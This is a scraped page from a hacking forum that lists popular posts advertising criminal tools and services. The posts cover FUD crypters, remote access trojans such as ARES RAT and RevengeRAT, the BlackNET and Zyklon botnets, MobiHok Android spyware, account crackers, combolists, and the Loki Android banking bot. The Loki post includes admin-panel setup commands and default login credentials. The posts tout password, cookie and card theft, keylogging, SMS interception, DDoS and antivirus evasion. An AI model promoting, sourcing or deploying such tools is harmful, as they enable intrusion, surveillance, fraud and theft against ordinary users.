Welcome to The Forum

Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to

existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile

and so much more. This message will be removed once you have signed in.

Active Hackers

The best community of active hackers. This community has been working in hacking for more than 10 years.

 

Hacker Forum

Hacker from all countries join this community to share their knowledge and their hacking tools

    Hacking Tools

    You can find thousands of tools shared by hackers. RAT's, Bot's, Crypters FUD, Stealers, Binders, Ransomware, Mallware, Virus, Cracked Accounts, Configs, Guides, Videos and many other things.

      PRIV8

      Become a Priv8 user and access all parts of the forum without restrictions and without limit of download. It only costs 100 dollars, and it will last you for a lifetime.

      Read Rules

      In this community we follow and respect rules, and they are the same for everyone, regardless of the user's rank. Read the rules well not to be prohibited.

      Leaderboard


      Popular Content

      Showing most liked content since 12/24/2019 in all areas

      1. 5 likes
        Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      2. 5 likes
        Lime Crypter v0.5 A free FUD obfuscation tool An obfuscation tool for .Net + Native files. Main Features .NET - Coded in C#, required framework 4.0 dependency. Injection - Hide payload behind a legit process Lime Crypter v0.5 | .NET + NATIVE + Source Code [HIDE][Hidden Content]]
      3. 4 likes
        RevengeRAT, a moded version [HIDE][Hidden Content]] Server Scan
      4. 4 likes
        Only tested it with Native exe files. I don't know about .Net - Don't compress ur file before uploading as it will automatically compress it. - Crypted file takes time to execute as it brute-force a key. so execution depends on ur PC specs. - I made this for free. using free tools. so don't be a jerk to try to profit from it. too much abuse and i'll take it down. - No, I'm not trying to infect anyone nor collect any samples. I made this as a lil side fun project. - Might improve in future and add parameters and Clay Davis but I'm too busy and lazy todo it or learn how. - I set a crontab job to delete all crypted files within 10 minutes. (if you're trying to download and failed then it prolly was deleted while crontab job was running) - Max file upload size: 15mb. - Only .exe files allowed ( no double dotted file names ). [HIDE][Hidden Content]] File Name: notepad-crypted-1569859836846.exe Scan Date: 30/09/2019 18:12 MD5: 9184051d109981b8990bbb68fe840476 Filesize: 273.12 KB Detection: 0 / 24 Link: [Hidden Content] Scanned with CyberScan.org (No distribute scanner) Ad-Aware Antivirus - Clean Arcabit Antivirus - Clean Avast Internet Security - Clean AVG Internet Security - Clean Avira Anti-Malware - Clean BitDefender Antivirus - Clean BullGuard Antivirus - Clean ClamAv Antivirus - Clean Comodo Essentials - Clean Cyren Antivirus - Clean Windows Defender - Clean eScan Antivirus - Clean Eset Internet Security - Clean F-Prot Security - Clean F-Secure Antivirus - Clean Emisoft Anti-Malware - Clean Immunet Antivirus - Clean Kaspersky Endpoint- Clean Nano Antivirus - Clean Ikarus Antivirus - Clean Sophos Antivirus - Clean Xvirus Anti-Malware- Clean Zillya Antivirus - Clean ZoneAlarm Antivirus - Clean
      5. 4 likes
        [+] Customizable data changer. [+] Check for email with paid suscriptions and changes data automatically. [+] Supports All the proxies Types! HTTP, SOCKS4, SOCKS5 [+] Full capture system [+] 4 Methods to use. [+] All Combos supported. [+] Easy to use. [HIDE][Hidden Content]]
      6. 3 likes
        BlackNET Free Advanced MultiOS with a Secure PHP Interface Botnet with VB.NET and Python based Stub and VB.NET Builder About BlackNET BlackNET is an advanced botnet with PHP Panel and VB.NET or Python Output for MultiOS Hacking Developed By: Black.Hacker What You Can Do On Windows - Upload File - DDOS Attack [ TCP,UDP,ARME,Slowloris ] - Open Webpage - Show MessageBox - Take Screenshot - Steal Firefox Cookies - Steal Saved Passwords - Keylogger - Uninstall Client - Move Client - Blacklist Client - Close Client On Linux - Print Simple Message for Client - Open Webpage - Upload File - Simple DDOS Attack - Execute Shell Commands - Uninstall Client - Close Client v1.0.0 + PHP Panel - Simple Stats - Bugs Fixes - UI Enhancements - Select all button - Map Visualization - Fixed Some Database Issues - New Menu [ Move Client,Execute Shell] - Ability to change admin username - reCAPTCHA Integration - Security Enhancements - Added Security Questions - Updating the Hashing System MD5 to SHA256 - New and Stronger Salt - 2FA Implementation [ Code by Email ] - Secure Reset Password System [ Recover your password if you forget it ] - upload.php to Upload files to the network - PHPMailer Integration with SMTP Settings - Password Stealer Plugin - Better [ Country Code to Country Name ] Function + VB.NET - RSA Encryption for BlackNET Panel URL - Move client to another Host - Take screenshot every 10 seconds - Firefox Cookies Stealer - Keylogger Module - Check Blacklist - Update the junk code - Speed Optimization - Plugin Helper Function - Password Stealer Function - Stealth Mode Function - Bug Fixs + Python - Updated to v1.0.0 - Malware Builder - Execute Shell Commands - Bug fixes [HIDE][Hidden Content]] Server Scan
      7. 3 likes
        Bypass Suspicious Login For Instagram Hello again, today I’m gonna be teaching you how to bypass Instagram’s Suspicious login. [Hidden Content]
      8. 3 likes
        This program has been created by dEEpEst --- RELEASES VERSION --- This version is version 2.4.2 has just been born --- DESCRIPTION --- This software is a remote administration tool --- LINKS --- [Hidden Content] [Hidden Content]/hackers/topic/44370-ares-rat-v100 [Hidden Content]/hackers/topic/44869-ares-rat-v121 [Hidden Content]/hackers/topic/46961-ares-rat-v200 [Hidden Content]/hackers/topic/47882-ares-rat-v242 In contruccioon .... --- TUTORIALS AND MANUALS --- [Hidden Content] [Hidden Content] [Hidden Content] In contruccioon .... --- AUTHORS --- [Hidden Content]/hackers/profile/1-deepest/ --- DONATE --- You can always help us by sending any amount to one of these accounts [Hidden Content]/hackers/clients/donations/ In contruccioon .... --- COPYRIGHT --- Its free distribution is allowed as long as the credits and links are respected --- UPDATE VERSION --- ARES RAT v2.4.2 --- WHAT'S NEW IN THIS VERSION --- RDP Native Fixed minor problems in client //:::::::::::::::::::::::::::::::::::::::::::::::::::// --- UPDATE VERSION --- ARES RAT v2.0.0 --- WHAT'S NEW IN THIS VERSION --- Proxy Reverse Checked Proxy It was repaired sight flags by countries Was added "sqlite3" missing library Was added two styles darks //:::::::::::::::::::::::::::::::::::::::::::::::::::// --- UPDATE VERSION --- ARES RAT v1.2.1 --- WHAT'S NEW IN THIS VERSION --- Was added missing style library Changed target platform in ATENEA.exe (server) for NET. Framework 2.0 It was repaired active firewall tester //:::::::::::::::::::::::::::::::::::::::::::::::::::// --- TITLE & VERSION --- ARES RAT v1.0.0 --- DESCRIPTION --- ARES RAT is a remote administration tool. We can remotely control other computers millions of kilometers away. Things like viewing files, downloading them, changing registers, running programs, watching webcam, stealing BTC, stealing passwords, registering keystrokes, launching Ddos attacks, and many other things. --- FEATURES --- File Manager Remote Desktop Remote Cam Remote Shell Process Manager Run File from Disck Run File from Link Regedit Start Process Stop Process Run Script Notify Chat Keylooger Get Password Stealer Bitcoin DDos Atack Bypass UAC Disable/Enable Windows OFF Shutdown Restart IExplorer Home Page Windows Update ON/OFF Desktop Icons Show/Hide Taskbar Show/Hide Sound Mute/UnMute Sound Beep Speak Computer Play Music Hidden Error Sound CMD Enable/Disable CD Open/Close Clock Show/Hide Keyboard Block/UnBlock Mouse Reverse/Normal Cursor Show/Hide Monitor Turn Off/On Task Manager Enable/Disable Registry Enable/Disable System Restore Enable/Disable Open Website Get ClipBoard Copi IP User Info Computer Info Server Rename Server Update Server Closed/Restart Server Uninstall Extras Port Listen Password Lenguage (Only English) Change Styles Port Scanner IP Grabber Spoofer No-IP Binder Mutex Persistence Hide After Run Melt After Run Startup Copy folder temp Directory server Install Server folders Injection Svchost Antis Spread USB Block VirusTotal Change Icon Logs --- DISCLAIMERS --- You can use and distribute this tool freely, keep in mind that this tool is designed for student use and that you are responsible for the misuse that could be given. --- BUGS --- All the bugs can be repeated anywhere in the "About" tab, and I will try to correct it as soon as possible. --- PERSONAL NOTE --- For a long life for this warrior! Happy hacking! Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      9. 3 likes
        PhoneSploit Tool Hack Android Devices just with an IP address using ADB connect feature. You can also exploit millions of devices from Shodan using this tool. Download: [Hidden Content]
      10. 3 likes
        * Sure you can't decrypt these config's! [HIDE][Hidden Content]]
      11. 3 likes
        Enigma Protector is a powerful system designed for comprehensive protection of executable files. File protection A set of functions and technologies that allow to protect executable files from hacking, research, modification and disassembly. Using a virtual machine allows you to run part of the application code and protection on your own virtual processor, unauthorized access to which is a very difficult task.
      12. 2 likes
      13. 2 likes
      14. 2 likes
        URL Login / Good Keyword - Modded [HIDE][Hidden Content]]
      15. 2 likes
      16. 2 likes
        The author released it, because the v5 is out [Hidden Content] [HIDE][Hidden Content]] MobiHok The program is great and easy to use and stable, works on all versions of Android devices and without need for a ROOT, To spy anywhere and anythings ( Camera Live , Record mic , Explore files ,Download files ,etc ), The software is safe for use on all sides. Control all device tools Watch live cam Listen live microphone Browse and Downlaod files Get Contact,Log call, Account,SMS Get place Gps Keylogger Offline/Online. Bypass protection Bypass play protect Bypass protect samsung Advanced encryption Private Socket Private Binder
      17. 2 likes
        Embed and hide any file in HTML Author: Arno0x0x What this tool does is taking a file (any type of file), encrypt it, and embed it into an HTML file as ressource, along with an automatic download routine simulating a user clicking on the embedded ressource. Then, when the user browses the HTML file, the embedded file is decrypted on the fly, saved in a temporary folder, and the file is then presented to the user as if it was being downloaded from the remote site. Depending on the user's browser and the file type presented, the file can be automatically opened by the browser. Point the target's browser to the html file and let the magic happen: Download: [HIDE][Hidden Content]]
      18. 2 likes
      19. 2 likes
      20. 2 likes
      21. 2 likes
        [HIDE][Hidden Content]] Pass: level23hacktools.com
      22. 2 likes
        [HIDE][Hidden Content]] Pass: level23hacktools.com
      23. 2 likes
      24. 2 likes
      25. 2 likes
        How To Trace Location Of a Person By Chatting On Whatsapp, facebook, Instagram, Snapchat [Hidden Content]
      26. 2 likes
        How to Make Private Mail Access Combo from SQLi 100% Private+Valid[NEW METHOD 2019] [Hidden Content]
      27. 2 likes
        Keywords For Everything! Download : [HIDE][Hidden Content]]
      28. 2 likes
        Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      29. 2 likes
      30. 2 likes
        captures: Profile link, balance, email, email verification status, games. [Hidden Content] Key? Pm me
      31. 2 likes
        All you need is VS . 1. You open the project file 2. Then you go to "Program.cs" 3. After that you replace "[Hidden Content]" with your direct download link. 4. You compile everything 5. Finished [Hidden Content] Password: level23hacktools.com
      32. 2 likes
        Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      33. 2 likes
        Zyklon HTTP Botnet Zyklon HTTP is a botnet that is currently being sold on the Darknet (see Figure 1), HackForums and available on a number of member only communities. This botnet supports Tor for anonymization and comes loaded with a number of additional features. It allows its users to execute various types of DDoS attacks, data theft and fraud. It also features secure operation mechanisms to detect other malware and assure its availability. Zyklon HTTP Botnet targets PCs and spreads itself via a number of different methods including phishing attacks. Figure 1: Zyklon H.T.T.P for sale on the darknet Attack Methods Distributed Denial of Service HTTP Flood The Zyklon HTTP botnet consists of seemingly legitimate session-based sets of HTTP GET or POST requests that are designed to consume a significant amount of server's resources, and can result in a denial-of-service condition - without necessarily requiring a high rate of network traffic. TCP flood Sending numerous SYN packets to the victim. In many cases, attackers will spoof the SRC IP so the reply (SYN+ACK packet) will not return, thus overwhelming the session/connection tables of the targeted server or firewall. Servers need to open a state for each SYN packet that arrives and store this state in tables that have limited size and are easily filled. Once this happens, the server drop new requests, including legitimate ones. UDP Flood The Zyklon HTTP botnet attacker sends large UDP packets to a single destination or to random ports. Since the UDP protocol is “connectionless” and does not have any type of handshake mechanism, the main intention of a UDP flood is to saturate the Internet pipe. Usually, the attackers spoof the SRC IP. SYN Flood Overwhelming a target machine by sending thousands of connection requests to it using spoofed IP addresses. The target machine attempts to open a connection for each malicious request and subsequently wait for an ACK packet that never arrives. Since a SYN-ACK packet never arrives, the massive number of half-open connections quickly fills up the server’s TCB table before it can time any connections out. SlowLoris By sending HTTP headers in tiny chunks as slow as possible (just before the server would time out the request), the target server is forced to continue to wait for the headers to arrive. If enough connections are opened to the server in this fashion, it is unable to handle legitimate requests. Malware Contamination Cloud-based malware inspection Zyklon HTTP botnet will enumerate all startup files and upload them to the VirusTotal online malware scanner. This will lead to analyzing of samples of malicious software that resides on the system. If the file is found to be malicious, Zyklon HTTP botnet will terminate all processes associated with that file and remove the file along with the registry keys from the system. This is a great option for perpetrators to ensure that their enslaved client systems are running without disruption. The botnet user can specify files to exclude from VirusTotal, and by calculating the MD5 hash of the file Zyklon HTTP botnet will skip it while scanning. Botkiller While the Cloud-based malware inspection relies on VirusTotal, Botkiller uses its own algorithm to determine if a file is malicious or not. This method tends to have more false-positive detections. When using this feature, Zyklon HTTP botnet will scan all processes and will check common locations that malwares reside in. It will attempt to detect injected processes and it will try to identify malware by behavioral analysis. If a file is detected as malicious the program will follow the settings specified in the botkiller feature, leading to the process termination and deletion of all associated files and registry keys. Like the Cloud-based malware inspection, this feature is keeps an enslaved client machine secure and available. Keylogger Keylogger is a great feature when it comes to client surveillance. It will record all keystrokes and log them to a database. The logs are sorted by dates and can be accessed from almost anywhere in the C&C panel. The control panel also lets one specify the window titles to record keystrokes for, as opposed to bloated logs with all kind of entries. Keylogger supports most if not all languages and keyboard layouts. The user can specify the maximum amount of characters that will client hold in a buffer before they are sent to the panel, or set an interval at which the logs are being uploaded to the panel. Automatic updater Zyklon HTTP botnet features automatic update function that ensures that all enslaved clients are running up to date software. When executed, it compares the update file hash and installed file hash and if found different – an updated file will be downloaded and installed. This comes very handy when controlling many clients. Figure 2: Zyklon HTTP Panel Data Theft Browser password recovery Zyklon botnet is able to recover passwords from popular web browsers. Most noticeable ones are Google Chrome, Mozilla Firefox, Internet Explorer, Opera Browser, Chrome Canary/SXS, CoolNovo Browser, Apple Safari, Flock Browser, SeaMonkey Browser, SRWare Iron Browser and Comodo Dragon Browser. FTP password recovery Currently supports FTP password recovery from following FTP applications: FileZilla, SmartFTP, FlashFXP, FTPCommander, Dreamweaver, WS_FTP Gaming software key recovery Currently supports around 50 PC gaming software’s including Battlefield, Call of Duty, FIFA, NFS, Age of Empires, Quake, The Sims, Half-Life, IGI, Star Wars and many more. License key recovery Automatically detects and decrypts the license/serial keys of over 200+ popular software’s including Office, SQL Server, Adobe, Nero and many more. Socket Secure 5 proxy Turn your bots into proxy servers - The Zyklon HTTP botnet automatically checks and updates a list of active proxy servers, and features reverse socket secure proxy servers, facilitating the creation of a proxy server on any client. Email password recovery Currently it can recover your lost email passwords from following applications: Microsoft Outlook Express, Microsoft Outlook 2002/XP/2003/2007/2010/2013, Mozilla Thunderbird, Windows Live Mail 2012, IncrediMail, Foxmail v6.x - v7.x, Windows Live Messenger, MSN Messenger, Google Talk, GMail Notifier, PaltalkScene IM, Pidgin (Formerly Gaim) Messenger, Miranda Messenger, Windows Credential Manager. Encrypted communication Connection between client and server is encrypted using RSA asymmetric encryption algorithm (Valid key sizes are 512-bit, 1024-bit, 2048-bit, 4096-bit) that is paired with AES-256. AES-256 keys are dynamically generated on the client and are encrypted before being stored in a session variable in the panel. After the initial key exchange, the whole communication is encrypted with AES-256. Figure 3: Zyklon Builder * In its previous version, Zyklon was able to perform crypto mining services but this feature has been removed in the latest update. It is likely to return more mature and sophisticated in a future version, as it used to turn the infected computers into Bitcoin miners for profit – a very popular competence. How to install Zyklon H.T.T.P BotNet on your server [Hidden Content] Download: [HIDE][Hidden Content]]
      34. 2 likes
        Description With Codejock Suite Pro for ActiveX COM you can create professional software that has a wide range of customizable components for the user interface. For example, you can use the Visual Studio Connection Panel and the Ribbon Office style. It also has toolbars and menus that give your software a professional look. Components include the Codejock Xtreme Suite Pro Command Bars: Provide multiple choice options including Ribbon Office and Visual Studio style and Office theme support, Tab and transparent toolbars, MDI tabs and gallery controls, accelerators and shortcuts, call and save buttons , The possibility of full customization Controls: Various options including buttons, combo boxes, common messages, progress bar, editing controls, warning popups, theme compatible scrollbars, tab controls, shell controls, XAML trademark support, management Taskbar and… Chart Pro: Provide several types of charts including strip, dot, line, circular, radar, polar, region, financial, gantt, funnel, pyramid, graph and analytical with varied possibilities Calendar: Provides various options to choose from integrated time scales and date picker , multiple schedulers, daily and monthly calendar views, Microsoft Office and custom theme support, various data formats including XML, MySQL, SQL Server and Outlook and more Docking Pane: Visual Studio and Office connectivity panels, Visio connector style, auto-hide window, Pinnacle panels, drag-and-drop location, cascade panels, etc. Property Grid: Ability to use the integrated toolbar and Help Panel, hierarchical editable lists, local button controls, data sorting, combination lists, separator sizes, editing masks, etc. Report Control: Features include integrated field selector, virtual list mode, reusable layouts, multiple selections, tree display mode, office theme support, different cell types, column attributes and more. Shortcut Bar: Features include expandable navigation bar, shortcut list, panel display and hide, shortcut icons, title bar, Office and Windows theme support and more. Syntax Edit: Provides features including the ability to group add-on blocks, syntax coloring, line numbering, font type, predefined color schemes, bookmarks, breakpoints, and more. Skin Framework: Provides a variety of options to choose from, including Windows and Office software skins, support for all Windows controls, skin build software, multiple skin support, custom theme support, and more. Task Panel: Features include group titles, animations, expandable groups, margins, Visual Studio and Office theme support, toolbar layouts, drag and drop capabilities, fast tracking and more. The set of changes made here is visible. Required system Supported Environments Visual Studio 2013 Visual Studio 2012 Visual Studio 2010 Visual Studio 2008 Visual Studio 2005 Visual Studio 2003 Visual Studio 2002 Visual Basic 6.0 Microsoft Access Supported Operating Systems Windows 8.1 ( x32, x64 ) Windows 8 ( x32, x64 ) Windows 7 ( x32, x64 ) Windows Vista ( x32, x64 ) Windows XP ( x32, x64 ) Windows Server 2012 R2 ( x64 ) Windows Server 2012 ( x64 ) Windows Server 2008 R2 ( x64 ) Windows Server 2008 ( x32, x64 ) Windows Server 2003 ( x32, x64 ) Windows 2000 Windows Me Windows 98SE Windows 98 Windows NT 4.0 Windows 95 Minimum Requirements Visual Basic 6.0 Windows 95 or NT 4.0 [Hidden Content] [Hidden Content]
      35. 2 likes
      36. 2 likes
      37. 2 likes
        [Hidden Content] user:pass combolist / proxies HQ
      38. 2 likes
        FUD Win32 payload generator and listener Legal disclaimer: Usage of GetWin for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program Features FUD : Fully Undetectable No Need configure port forwarding, or install others programs, using only ssh and serveo.net. [HIDE][Hidden Content]]
      39. 2 likes
      40. 2 likes
        version 2.1.6) Selenium Bots: 3 Launch You just have to import the Amazon GC.BBC config into BlackBullet with a drag an drop After you have imports a random combolist whose content is not important The config is proxyless The hits will be in the hits but you have to right click on the hits and see the last page loaded To change the Amazon account you have to go in config, LOAD the correct config and go into stacker and you will be able to change in the following two action elements: [HIDE][Hidden Content]]
      41. 2 likes
        B9CP-DN3JBM-B7NL5 &!&&-&&!&&&-&!&&! or u can generate codes with BB too
      42. 2 likes
        Name: Rapidgator BOTS: 200 PROXIES: YES COMBOS: MAIL/PASS CPM: 200+ [HIDE][Hidden Content]]
      43. 2 likes
      44. 2 likes
        AutoIT [HIDE][Hidden Content]] Pass: level23hacktools.com [Hidden Content]
      45. 2 likes
        MULTI ACCOUNT CRACKER EZCRACK V1.7 CRACK (TWITTER, NETFLIX, SPOTIFY, MINECRAFT, ETC) 1. AddMeFast (Captures Point Balance) 2. Crunchyroll (Premium Only) (Proxyless) 3. Dunkin Donuts (Captures GC Balance) 4. Facebook 5. Beatsmusic (Captures Premium) 6. Gamestop (Captures Point Balance) 7. Gyft (Proxyless) 8. Hulu (Captures Premium) 9. Instagram (Capture # of Followers) 10. Twitter (Proxyless) (Capture # of Followers) 10. Netflix (Captures Premium Only + Amount of screens/devices allowed) 11. League of Legends NA 12. League of Legends EUNE 13. League of Legends EUW 14. Origin (Captures Games + Amount of Games) 15. Papa Johns (Captures points - get free Papa Johns Pizza) 16. PSN (Captures amount of games + games) 17. Rdio (Captures premium accounts only) 18. Shutterstock (Captures account type) 19. Skype (Subscription Type) 20. Spotify (Subscription Type) 21. RealityKings (Subscription Type) 22. Subway UK (Captures Point Balance) 23. Runescape 24. Mofos (Premium Only) 25. Steam (Captures Games, Steam Guard Disabled Only) 26. DeathByCaptcha (Captures Points) 27.AMAZON (CAPTURES ORDERS AND GIFT CARD BALANCE) (DBC ONLY) 28. SWAGBUCKS (CAPTURES SWAGBUCKS) (PROXYLESS) 29. Minecraft [HIDE][Hidden Content]]
      46. 2 likes
        Features of the bot: - Graber cards - Spam on user contacts - Calling the number - Forwarding incoming calls - Launching user applications - Automatic withdrawal of fake notifications, with taken bank icons - Interception, block-deleting incoming SMS, sending, including short numbers - Download all user application names - Graber contacts - Screen locker - Launch pages in the browser - Launch user applications - Search for Bank applications - Browser history graber - Socks5 module - Sending USSD - Geolocation - Spam by number base Admin panel: Detailed statistics on countries, app, url histories, selerians, etc. The ability to issue commands to a particular bot, group, as well as all newcomers. Search by imei, sorting by installed applications, online bots, seler, countries. Cleaning of old logs. Separate statistics for traffic. Jabber notification. There is a possibility to load their injections, with the admin panel. Search by SMS, logs. Searching for links by history. The statistics for the tasks that have been issued are fulfilled. Etc. Additional info: The size of the bot is 150 kb. Stable work on Android 4-7. For basic work, root rights are not required. Request admin rights. To change the phone password, you need the admin rights (requested when installing). Change the password to Android Nougat (Android 7) version in part. Sending and intercepting SMS on all versions, deleting up to 4.4, downloading all SMS from 4.4, block SMS over 4.4 via SMS manager / Screen Locker (when locked via SMS manager, SMS is not seen only by the Holder). Permanent withdrawal of bank (fake) notifications with bank icons, the text can be set with the admin panel when you click on the message the injection is started. In the presence of injections of euro countries, they are bundled with a bot. An additional functional is possible. Android Bot Loki We want to offer a bot of our own developments. A completely new bot engine, the wishes of the customers are part of the functions of are automated, advanced functionality. Bot features: - Card grabber - Phone contacts spam - Custom numbers spam - Call to number - Incoming call forwarding - Start user applications - Automatic invoke fake notifications with custom icons - Catch, block, delete incoming SMS. Sent new SMS - Get list of user applications - Contact grabber - Screen locker - Web application browser - Bank applications searching - Browser history grabber - Socks5 module - Geolocation Admin panel: Detalized statistics of countries, app, history, sellers etc ... Ability for send command to one, list , or only new bots. IMEI search. Sort by installed applications, online, sellers, countries. Cleanup old logs Dedicated statistics for sellers. Jabber notifications. Admin panel have an ability to upload your own injects. SMS, logs searching. History links searching. Task statistiks. Additional information: Bot size: 150kb Bot is working with Android 4-7 Root permissions is NOT required for common actions. There are request for getting root permissions Root permissions required for Image phone password changing Phone password changing for All Android Nougat (All Android 7) of Post Send and catch statement SMS works on all All Android versions, the delete works only for 4.4, download and block SMS works All Android 4.4 and newest Permanent display bank notifications with custom text from admin panel. Bot have injects for euro countries. \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Loki admin panel install instructions: apt-get update && apt-get upgrade -y apt-get install apache2 libapache2-mod-php5 mysql-server php5 php5-mysql -y apt-get install default-jre default-jdk -y Debian 7: apt-get install ia32-libs lib32z1 lib32ncurses5 -y Debian 8: dpkg --add-architecture i386 apt-get update apt-get install libstdc++6:i386 libgcc1:i386 zlib1g:i386 libncurses5:i386 lib32z1 lib32ncurses5 Next: wget [Hidden Content] wget -O apktool.jar [Hidden Content] chmod +x ~/apktool.jar chmod +x ~/apktool mv ~/apktool.jar /usr/local/bin/ mv ~/apktool /usr/local/bin/ Next: unpack loki.tar to new dir. something like that: tar xf loki.tar -C /var/www/ change files owner: chown -R www-data:www-data /var/www/ Run: mysql create database loki; grant all privileges on loki.* to [email protected] identified 'DB_PASSWORD'; grant all privileges on loki.* to [email protected] identified by 'DB_PASSWORD'; quit import bd file loki4dev.sql: mysql loki < /var/www/site/loki4dev.sql mysql -u root -pbolonka1 loki </var/www/site/loki4dev.sql Edit: /var/www/site/db.php and enter mysql database access: db: loki db user: loki db password: DB_PASSWORD DONE!!!! address admin panel [Hidden Content] or [Hidden Content] login with name bot4fun and password J1HPbmr ...................................................................... Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      47. 2 likes
        Unhashing Tutorial -- RappaNow -- Keep in mind that copyright or just copying paste this tutorial will just get you permanently banned! [Hidden Content]
      48. 2 likes
        Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      49. 2 likes
        [Hidden Content] Download : [Hidden Content] More Info : [hide][Hidden Content]] Happy hacking!
      50. 2 likes
        Download: [HIDE][Hidden Content]] Passwoord: level23hacktools.com